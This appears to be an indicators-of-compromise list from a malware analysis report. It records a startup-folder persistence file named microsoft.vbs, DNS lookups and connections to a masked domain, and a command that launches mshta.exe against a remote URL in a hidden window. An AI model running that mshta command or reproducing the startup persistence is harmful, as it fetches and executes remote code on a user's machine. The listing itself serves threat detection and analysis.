Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ microsoft.vbs
- 'mi##ic.de':443
- 'microsoft.com':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'mi##ic.de':443
- DNS ASK mi##ic.de
- DNS ASK microsoft.com
- '<SYSTEM32>\mshta.exe' https://www.mi##ic.de/k/bg2z/wnps9/' (with hidden window)
- '<SYSTEM32>\mshta.exe' https://www.mi##ic.de/k/bg2z/wnps9/